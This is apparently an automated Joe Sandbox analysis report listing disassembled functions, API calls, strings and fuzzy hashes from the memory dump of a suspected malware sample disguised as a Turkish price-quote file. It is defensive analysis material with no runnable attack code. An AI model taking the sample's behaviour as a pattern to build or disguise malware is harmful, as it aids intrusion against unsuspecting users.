Opcode ID: 5b092ef924d8e0a044447c3b15bc2672c25c550ef66ddde1bbcad799cfda909c
Instruction ID: f44e138efc3c78415b85b8bb2fcc3e7f344f2f43351e783fa1faf7b871809fe5
Opcode Fuzzy Hash: 5b092ef924d8e0a044447c3b15bc2672c25c550ef66ddde1bbcad799cfda909c
Instruction Fuzzy Hash: 2F919D71A00219DFDB00DF98C885BBEB7B9FF85325F104429EA50EB2A1D774A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0099948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: e74ba7c39bb192cd442d53091a09f195faeb01668c5a206daaf65281230b5923
Instruction ID: ce72e9b4724386fe3999830c1fcbd0025bb4555aa7037845cb05c13667bfbb16
Opcode Fuzzy Hash: e74ba7c39bb192cd442d53091a09f195faeb01668c5a206daaf65281230b5923
Instruction Fuzzy Hash: 34913671D44219EFCF10CFA9C884AEEBBB8FF49320F148459E915B7251D378A942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A03947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A0396B
CharUpperBuffW.USER32(?,?), ref: 00A03A7A
_wcslen.LIBCMT ref: 00A03A8A
VariantClear.OLEAUT32(?), ref: 00A03C1F

Part of subcall function 009F0CDF: VariantInit.OLEAUT32(00000000), ref: 009F0D1F
Part of subcall function 009F0CDF: VariantCopy.OLEAUT32(?,?), ref: 009F0D28
Part of subcall function 009F0CDF: VariantClear.OLEAUT32(?), ref: 009F0D34

Strings

Incorrect Parameter format, xrefs: 00A039A6, 00A03BA1
AUTOIT.ERROR, xrefs: 00A03A80, 00A03A85

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 9ca2d3865de8b2f6f5bdbc891ae73883c19f4b12b1026cd37d4b0a3efe4d27d5
Instruction ID: 3a68f034b8f20c0d9b0d6eeaea5058c576ffe21a986eafd99b6a69d627cc92d4
Opcode Fuzzy Hash: 9ca2d3865de8b2f6f5bdbc891ae73883c19f4b12b1026cd37d4b0a3efe4d27d5
Instruction Fuzzy Hash: 569148756083459FCB04EF64D48096AB7E8BFC9354F14882DF8999B391DB31EE05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A04BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 009E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?,?,009E035E), ref: 009E002B
Part of subcall function 009E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0046
Part of subcall function 009E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0054
Part of subcall function 009E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?), ref: 009E0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A04C51
_wcslen.LIBCMT ref: 00A04D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A04DCF
CoTaskMemFree.OLE32(?), ref: 00A04DDA

Strings

NULL Pointer assignment, xrefs: 00A04E23, 00A04E52

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 2e6911e63a533eecb323922d105ed37442838371529a02afdbb66ad681581a20
Instruction ID: 1ff9a9dd21b1fa7b6f18f9857accd8fb29d7c1ec86478c94dd9a1af2b618be07
Opcode Fuzzy Hash: 2e6911e63a533eecb323922d105ed37442838371529a02afdbb66ad681581a20
Instruction Fuzzy Hash: 829129B1D0021DAFDF14EFA4D891AEEB7B8BF48310F10816AE515A7291EB309E45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A120FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00A12183
GetMenuItemCount.USER32(00000000), ref: 00A121B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A121DD
_wcslen.LIBCMT ref: 00A12213
GetMenuItemID.USER32(?,?), ref: 00A1224D
GetSubMenu.USER32(?,?), ref: 00A1225B

Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A122E3

Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 840dab09a18f5e7d636d92551649facd4313593f520fce8b1ce7bff39ef15d02
Instruction ID: 7d2f861b42ef2ad41352ad510eda4664eab65f82f062881e13534e399f2fc032
Opcode Fuzzy Hash: 840dab09a18f5e7d636d92551649facd4313593f520fce8b1ce7bff39ef15d02
Instruction Fuzzy Hash: 5B716F75A00205AFCB14EFA8C845BEEB7F5EF88320F148459E956EB351D734ED918B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A17E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(015E4E80), ref: 00A17F37
IsWindowEnabled.USER32(015E4E80), ref: 00A17F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A1801E
SendMessageW.USER32(015E4E80,000000B0,?,?), ref: 00A18051
IsDlgButtonChecked.USER32(?,?), ref: 00A18089
GetWindowLongW.USER32(015E4E80,000000EC), ref: 00A180AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A180C3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 18715e3849eae1228243b58cc3a24481aef86b515e34e4114c7ce2ecffb782f0
Instruction ID: 82185c8cd9da16638a2448c6e9d05564594858d57c493d663fa115496a321118
Opcode Fuzzy Hash: 18715e3849eae1228243b58cc3a24481aef86b515e34e4114c7ce2ecffb782f0
Instruction Fuzzy Hash: 99717A74608204AFEB21DF64C884FEFBBB9EF09310F145459E955972A1CB35AD86CB20

Uniqueness

Uniqueness Score: -1.00%

Function 009EAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 009EAEF9
GetKeyboardState.USER32(?), ref: 009EAF0E
SetKeyboardState.USER32(?), ref: 009EAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 009EAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 009EAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 009EAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 009EB020

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ac0457b4d7592f7ad098dece27aae32ab2aca81a050481c6b6ce7261c666b690
Instruction ID: d409124d82289796c2be315928a796bee86c09606663acd538a80c5b2157558c
Opcode Fuzzy Hash: ac0457b4d7592f7ad098dece27aae32ab2aca81a050481c6b6ce7261c666b690
Instruction Fuzzy Hash: 6751AFA06047D53DFB3783368C45BBBBEA95B46304F088989E1E9558E2C398FC88D751

Uniqueness

Uniqueness Score: -1.00%

Function 009EACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 009EAD19
GetKeyboardState.USER32(?), ref: 009EAD2E
SetKeyboardState.USER32(?), ref: 009EAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009EADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009EADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009EAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009EAE38

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a183f1c04071ec4f96e969b352201de918625c829d5cf4754af77086ddb4f43c
Instruction ID: 0630ed468f727cea1795a14a3476f2e4ed041d7100d607671e60297da19181f5
Opcode Fuzzy Hash: a183f1c04071ec4f96e969b352201de918625c829d5cf4754af77086ddb4f43c
Instruction Fuzzy Hash: A851D1A15047D53DFB3382668C95BBABEAD6F46300F08848CE1D9468E2C294FC88D762

Uniqueness

Uniqueness Score: -1.00%

Function 009B542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(009C3CD6,?,?,?,?,?,?,?,?,009B5BA3,?,?,009C3CD6,?,?), ref: 009B5470
__fassign.LIBCMT ref: 009B54EB
__fassign.LIBCMT ref: 009B5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,009C3CD6,00000005,00000000,00000000), ref: 009B552C
WriteFile.KERNEL32(?,009C3CD6,00000000,009B5BA3,00000000,?,?,?,?,?,?,?,?,?,009B5BA3,?), ref: 009B554B
WriteFile.KERNEL32(?,?,00000001,009B5BA3,00000000,?,?,?,?,?,?,?,?,?,009B5BA3,?), ref: 009B5584

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e5e7ec65b03eb2cfc861b9875dabd16ac5694199e27284094e7e512ba9a1cc47
Instruction ID: 9695fc074a3d171c90828254aebfa5a3669aeeca4e8f83c522114b80cb721805
Opcode Fuzzy Hash: e5e7ec65b03eb2cfc861b9875dabd16ac5694199e27284094e7e512ba9a1cc47
Instruction Fuzzy Hash: 9F510270A00609AFDB20CFA8D985BEEBBF9EF09321F15411AF955E7291D770DA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009A2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 009A2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 009A2D53
_ValidateLocalCookies.LIBCMT ref: 009A2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 009A2E0C
_ValidateLocalCookies.LIBCMT ref: 009A2E61

Strings

csm, xrefs: 009A2DF6

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4593c94286b64bc6f2f3dd6df2839ca3863cd0cde693d5cba0f1514e49878de3
Instruction ID: d93300ed88ee8a44dbd577cdf58f311f6037401ea7c2c8d7ae687bb775c6328b
Opcode Fuzzy Hash: 4593c94286b64bc6f2f3dd6df2839ca3863cd0cde693d5cba0f1514e49878de3
Instruction Fuzzy Hash: EF417134A01209ABCF10DF6CC845A9EBBB9BF86328F148155E8146B392D735EA55CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00A010B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A0304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
Part of subcall function 00A0304E: _wcslen.LIBCMT ref: 00A0309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A01112
WSAGetLastError.WSOCK32 ref: 00A01121
WSAGetLastError.WSOCK32 ref: 00A011C9
closesocket.WSOCK32(00000000), ref: 00A011F9

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: fe07f190adc204147e978c6c4811091507c2547f66ca15d3940f341b0aeadbbb
Instruction ID: 02af2845d97112b9c598529fd7012f923348100e0760a59ee61d7990c897b8ca
Opcode Fuzzy Hash: fe07f190adc204147e978c6c4811091507c2547f66ca15d3940f341b0aeadbbb
Instruction Fuzzy Hash: 7141C371600208AFDB14DF54D884BEABBE9EF85324F148159F9159B2D1D770ED42CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009ECF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ECF22,?), ref: 009EDDFD

Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ECF22,?), ref: 009EDE16

lstrcmpiW.KERNEL32(?,?), ref: 009ECF45
MoveFileW.KERNEL32(?,?), ref: 009ECF7F
_wcslen.LIBCMT ref: 009ED005
_wcslen.LIBCMT ref: 009ED01B
SHFileOperationW.SHELL32(?), ref: 009ED061

Strings

\*.*, xrefs: 009ECFF3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 1f27cde6e76b02666da86a3b2bd5a1220e3f346abd87c49d79b6edb1eede1acb
Instruction ID: 07204f6299b5ebdf215ab42f33085a38c4d2f4fafbcda1369896342028cc089f
Opcode Fuzzy Hash: 1f27cde6e76b02666da86a3b2bd5a1220e3f346abd87c49d79b6edb1eede1acb
Instruction Fuzzy Hash: EB4166B19452585FDF13EFA5C981BDEB7BDAF48380F0004E6E545EB141EB34AA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A12DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A12E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00A12E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00A12E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A12EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A12EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00A12EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A12F0B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 2fd14be2e601c332b5a6b9039bddd5f708b59ce434f7541bc1a42dd40080f867
Instruction ID: b568af90b5c60e4434584c0ac608add85464d911b7398b267e0c9bce5599d745
Opcode Fuzzy Hash: 2fd14be2e601c332b5a6b9039bddd5f708b59ce434f7541bc1a42dd40080f867
Instruction Fuzzy Hash: 0431F234684250AFEB21CF98DC84FA53BE5FB8A721F154164F9108B2B1CB75ECA19B41

Uniqueness

Uniqueness Score: -1.00%

Function 009E7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E778F
SysAllocString.OLEAUT32(00000000), ref: 009E7792
SysAllocString.OLEAUT32(?), ref: 009E77B0
SysFreeString.OLEAUT32(?), ref: 009E77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 009E77DE
SysAllocString.OLEAUT32(?), ref: 009E77EC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 898f2f97eb1adcdb9a70a6f5f5b2d5431d577a215798e2cf1c96cf310bc6e85b
Instruction ID: 1bda2bafbe09fdd40c74fe84c2e702e3c9671c6b6d3817c6a477185ea4853d45
Opcode Fuzzy Hash: 898f2f97eb1adcdb9a70a6f5f5b2d5431d577a215798e2cf1c96cf310bc6e85b
Instruction Fuzzy Hash: FE21B076608219AFDF11DFE9CC88DFBB3ACEB09364B048425FA05DB150D670DC828761

Uniqueness

Uniqueness Score: -1.00%

Function 009E77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009E7868
SysAllocString.OLEAUT32(00000000), ref: 009E786B
SysAllocString.OLEAUT32 ref: 009E788C
SysFreeString.OLEAUT32 ref: 009E7895
StringFromGUID2.OLE32(?,?,00000028), ref: 009E78AF
SysAllocString.OLEAUT32(?), ref: 009E78BD

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ba6b2616b9e856e8fa1f16231dc6a6af9dd9c0467ac5ed422796c039062b65b7
Instruction ID: 7ed43987119ffb7db4e7fa9b9e2509d5d1b44b18473192e74f71773eda664765
Opcode Fuzzy Hash: ba6b2616b9e856e8fa1f16231dc6a6af9dd9c0467ac5ed422796c039062b65b7
Instruction Fuzzy Hash: 5821B031608214AFDB11DFE9CCCCDAAB7ACEB183607108125F915CB2A0D674DC41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 009F04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009F04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009F052E

Strings

nul, xrefs: 009F0567

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 9573f8f6537203730c120e168737a94fba34bbe246899f54b85b5d873df22773
Instruction ID: 4c0121a2518bee8270b385ca0530c364c5da3420c209a2b7d20cf108fae22be2
Opcode Fuzzy Hash: 9573f8f6537203730c120e168737a94fba34bbe246899f54b85b5d873df22773
Instruction Fuzzy Hash: 11216075500309ABDF209F6ADC44AAA77BCBF95724F204A19FAA1D72E1D7B0D941CF20

Uniqueness

Uniqueness Score: -1.00%

Function 009F05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
